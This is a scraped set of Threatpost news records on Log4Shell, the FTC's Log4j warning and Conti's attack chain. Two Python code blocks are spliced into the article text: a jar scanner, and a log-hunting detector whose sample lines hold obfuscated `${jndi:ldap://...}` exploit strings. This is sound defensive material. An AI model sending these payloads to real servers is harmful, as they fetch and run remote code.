The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter in their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation 3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation 3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac serial killer\u2019s 340 cipher, which had gone unsolved for more than 50 years. In December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a small team of codebreakers.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around the Northern California area in the late 1960s and early 1970s. 
The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australia-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology, one of the basic building blocks of cybersecurity.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty 
laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201cIt is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as 
[Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 
15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it concerned Thread Context Map lookups that recurse without limit, not the Java Naming and Directory Interface (JNDI) lookups at the heart of CVE-2021-44228, in which the library resolves an attacker-supplied `${jndi:...}` string found in logged data, fetches an object from a server the attacker controls (over LDAP, for instance) and executes the code that is returned.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. 
We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. 
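The triage Guy describes, checking disk for the Log4j 2 core artifact, is harder than a filename search because log4j-core is routinely repackaged inside application jars, wars and ears, where no file on disk is named log4j. The Python scanner below is an added example written for this page, not a CISA or Sevco tool: it walks a directory tree, opens every jar/war/ear/zip it finds, recurses into archives nested inside them, reads the Maven pom.properties to recover the log4j-core version, and records whether JndiLookup.class is still present (deleting that class from the jar was the documented stop-gap for 2.10 through 2.14.1). The fixture jars it builds for the demo are constructed in memory and contain no real Apache bytecode; the fix thresholds it encodes (2.15.0, plus 2.12.2 on the Java 7 line and 2.3.1 on the Java 6 line) are the CVE-2021-44228 fix releases, and the verdict text sends the operator back to the current Apache advisory for the later CVEs.

```python
"""Triage: find Log4j 2 core artifacts on disk, including those bundled inside other archives."""
import io
import os
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# CVE-2021-44228 fix releases per branch; later CVEs moved these further (check the current advisory).
FIXED_BRANCH = {(2, 3): (2, 3, 1, 999), (2, 12): (2, 12, 2, 999)}
FIXED_MAINLINE = (2, 15, 0, 999)
FIRST_AFFECTED = (2, 0, 0, 9)  # 2.0-beta9


@dataclass
class Finding:
    location: str              # file path; '!' separates an archive from one nested inside it
    version: Optional[str]     # None when no log4j-core pom.properties was present
    jndi_lookup_present: bool
    verdict: str


def parse_version(ver: str):
    """'2.14.1' -> (2, 14, 1, 999); '2.0-beta9' -> (2, 0, 0, 9). Releases sort after betas."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:beta|rc)(\d+))?", ver)
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), int(pre) if pre else 999)


def verdict_for(version: Optional[str], jndi_present: bool) -> str:
    v = parse_version(version) if version else None
    if v is None:
        return "unknown version: inspect manually"
    if v < FIRST_AFFECTED:
        return "pre-2.0-beta9: not affected by CVE-2021-44228"
    if v >= FIXED_MAINLINE or v >= FIXED_BRANCH.get(v[:2], FIXED_MAINLINE):
        return "CVE-2021-44228 fixed; confirm against the current Apache advisory"
    if not jndi_present:
        return "vulnerable version but JndiLookup.class removed (mitigated); still upgrade"
    return "VULNERABLE to CVE-2021-44228: upgrade"


def scan_archive(data: bytes, location: str, findings: List[Finding]) -> None:
    """Inspect one archive held in memory and recurse into any archive it embeds."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container (e.g. a stray .jar that is really something else)
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    jndi = JNDI_LOOKUP_CLASS in names
    if version is not None or jndi:
        findings.append(Finding(location, version, jndi, verdict_for(version, jndi)))
    for name in names:  # fat jars / Spring Boot / WAR files carry log4j-core as a nested jar
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            scan_archive(zf.read(name), f"{location}!{name}", findings)


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory and scan every archive in it (the real entry point for a host)."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, findings)
    return findings


def build_sample_jar(version: str, include_jndi: bool) -> bytes:
    """Constructed fixture: a fake log4j-core jar with only the two files the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, no real bytecode
    return buf.getvalue()


def build_sample_fat_jar(inner: bytes) -> bytes:
    """Constructed fixture: an application jar that bundles log4j-core under BOOT-INF/lib."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", inner)
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo() -> List[Finding]:
    """Scan three constructed archives: nested vulnerable, class-stripped, and patched."""
    findings: List[Finding] = []
    scan_archive(build_sample_fat_jar(build_sample_jar("2.14.1", True)), "app.jar", findings)
    scan_archive(build_sample_jar("2.14.1", False), "log4j-core-stripped.jar", findings)
    scan_archive(build_sample_jar("2.17.0", True), "log4j-core-2.17.0.jar", findings)
    return findings


if __name__ == "__main__":
    for f in demo():
        print(f"{f.location}: version={f.version} jndi={f.jndi_lookup_present} -> {f.verdict}")
```

On a real host, `scan_tree("/")` (or the application directories) replaces `demo()`; the `location` field with its `!` separators is what makes the output actionable, since it names the exact nested archive to rebuild rather than the outer application file. Note what the scanner cannot see: Log4j compiled into shaded jars that relocate the package name, or present only inside a running process, which is why the asset-inventory point made above still stands.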
\u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>)_._\n\n_**Password Reset: **[**On-Demand Event**](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)**:** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James of Specops Software, Roger Grimes, defense evangelist at KnowBe4, and Threatpost host Becky Bracken. 
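The JNDI lookup string behind CVE-2021-44228, described in the three-bug rundown above, is also what defenders look for when they hunt the probing Microsoft reports: a `${jndi:...}` lookup arriving in any field the application might log, such as the URL, User-Agent, Referer or other headers. Attackers obfuscated it with Log4j's own nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) and with URL-encoding, so a literal grep for `jndi` misses much of the traffic. The Python below is an added example for this page, not code from Threatpost, Microsoft or the CISA scanner: it percent-decodes each logged field, resolves the obfuscation lookups innermost-first the way Log4j's own interpolator would, and only then matches the normalized string. The access-log lines are constructed for this example (TEST-NET addresses), not real traffic.

```python
"""Normalize Log4Shell probe strings and flag them in web-server access logs."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization the jndi prefix is in the clear; the scheme is optional.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nis|nds|http)?", re.IGNORECASE)
# Apache/nginx "combined" log format: enough to pull out the fields applications tend to log.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def resolve_inner(body: str) -> str:
    """Evaluate lookups attackers use purely for obfuscation; keep anything else verbatim."""
    head = body.lower()
    if head.startswith("lower:"):
        return body[len("lower:"):].lower()
    if head.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:              # ${anything:-default} yields 'default', including ${::-j}
        return body.split(":-", 1)[1]
    return "${" + body + "}"      # jndi:, env:, date: and the like stay as written


def normalize(value: str) -> str:
    """Percent-decode (twice, for double encoding), then collapse nested lookups innermost-first."""
    text = unquote(unquote(value))
    for _ in range(32):           # bound the work; real payloads nest a handful of levels
        changed = False

        def substitute(match) -> str:
            nonlocal changed
            out = resolve_inner(match.group(1))
            if out != match.group(0):
                changed = True
            return out

        text = INNER.sub(substitute, text)
        if not changed:
            break
    return text


def is_log4shell_probe(value: str) -> bool:
    return JNDI.search(normalize(value)) is not None


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, field, normalized payload) for each field carrying a JNDI lookup."""
    hits: List[Tuple[int, str, str]] = []
    for number, line in enumerate(lines, 1):
        match = COMBINED.match(line)
        fields: Dict[str, str] = match.groupdict() if match else {"raw": line}
        for field, value in fields.items():
            if is_log4shell_probe(value):
                hits.append((number, field, normalize(value)))
    return hits


# Constructed sample traffic (not real logs): plain, encoded, ${::-} and a benign non-JNDI lookup.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.9 - - [20/Dec/2021:10:02:11 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.11 - - [20/Dec/2021:10:03:30 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.9/a}" "Mozilla/5.0"',
    '203.0.113.13 - - [20/Dec/2021:10:04:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, field, payload in scan_log_lines(SAMPLE_LOG):
        print(f"line {number} [{field}]: {payload}")
```

Running it flags lines 2 (User-Agent), 3 (request, after percent-decoding) and 4 (Referer, after collapsing the `${::-x}` fragments), and leaves the `${date:yyyy}` line alone. Matching on the normalized string rather than the raw bytes is the point: the same normalizer can be run over proxy, WAF or application logs, and a hit in any field is a reason to check that host against the triage results rather than just block the source address.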
**[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active 
\u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> vCenter ESXi with log4shell scan for vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes\u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share. **Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. 
As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast. **Kerberoasting, a common, pervasive attack that exploits a combination of weak encryption and poor service account password hygiene, is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. **VMware vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMware networks for initial access and lateral movement. The VMware servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but its patch, Log4j 2.15.0, [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations and paved the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4j logging library. Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 
12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named [Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note [lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari ransomware was just one piece of malware that\u2019s been thrown at vulnerable servers over the course of the Log4j saga. Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), 
reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. The compressed timeline of the public disclosure followed fast by threat actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s use of the legitimate Atera Agent remote-management tool lets the gang keep persistence in infected environments, especially those protected by more aggressive, machine-learning-based endpoint detection and response (EDR) products. 
\u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New[ backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive[ Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>)\n\nTimeline of Conti\u2019s search for new attack vectors. Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMWare\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at 